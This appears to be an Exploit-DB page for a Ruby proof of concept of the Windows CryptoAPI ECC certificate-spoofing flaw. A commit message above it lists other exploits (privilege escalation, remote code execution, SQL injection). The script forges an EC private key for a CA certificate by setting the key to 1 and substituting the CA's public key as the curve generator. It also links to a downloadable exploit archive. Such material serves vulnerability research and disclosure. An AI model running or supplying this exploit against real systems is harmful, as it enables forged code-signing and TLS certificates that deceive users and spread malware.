1a9ce31a5f
12 changes to exploits/shellcodes SunOS 5.10 Generic_147148-26 - Local Privilege Escalation Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP) Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting VICIDIAL Call Center Suite - Multiple SQL Injections Online Book Store 1.0 - 'bookisbn' SQL Injection WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting Online Book Store 1.0 - Arbitrary File Upload Tautulli 2.1.9 - Denial of Service ( Metasploit ) Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
23 lines
No EOL
648 B
Ruby
Executable file
23 lines
No EOL
648 B
Ruby
Executable file
# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47933.zip
|
|
|
|
require 'openssl'
|
|
|
|
raw = File.read "ca.crt"
|
|
ca_cert = OpenSSL::X509::Certificate.new(raw)
|
|
|
|
# Parse public key from CA
|
|
ca_key = ca_cert.public_key
|
|
if !(ca_key.instance_of? OpenSSL::PKey::EC) then
|
|
puts "CA NOT ECC"
|
|
puts "Type: " + key.inspect
|
|
exit
|
|
end
|
|
|
|
# Set new group with fake generator G = Q
|
|
ca_key.private_key = 1
|
|
group = ca_key.group
|
|
group.set_generator(ca_key.public_key, group.order, group.cofactor)
|
|
group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE
|
|
ca_key.group = group
|
|
|
|
puts ca_key.to_pem |